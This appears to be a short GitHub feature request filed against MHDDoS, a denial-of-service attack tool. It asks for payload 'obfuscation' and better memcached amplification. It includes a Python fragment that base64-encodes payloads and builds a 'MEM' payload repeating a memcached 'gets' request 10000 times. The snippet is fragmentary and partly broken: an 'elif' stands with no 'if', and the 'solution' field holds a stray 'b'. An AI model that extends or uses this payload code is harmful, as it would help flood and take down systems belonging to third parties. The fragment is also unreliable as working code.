MHDDoS
MHDDoS copied to clipboard
obuscation and better mem
Which section is this feature request for?
L7 (DDoS Attack Layer 7)
Is there an existing issue for this?
- [X] I have searched the existing issues
Is your feature request related to a problem? Please describe the problem.
import base64
def obfuscate(payload): return base64.b64encode(payload)
elif name == "MEM": payload = b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n' * 10000
Describe the solution you'd like
b
Additional context
No response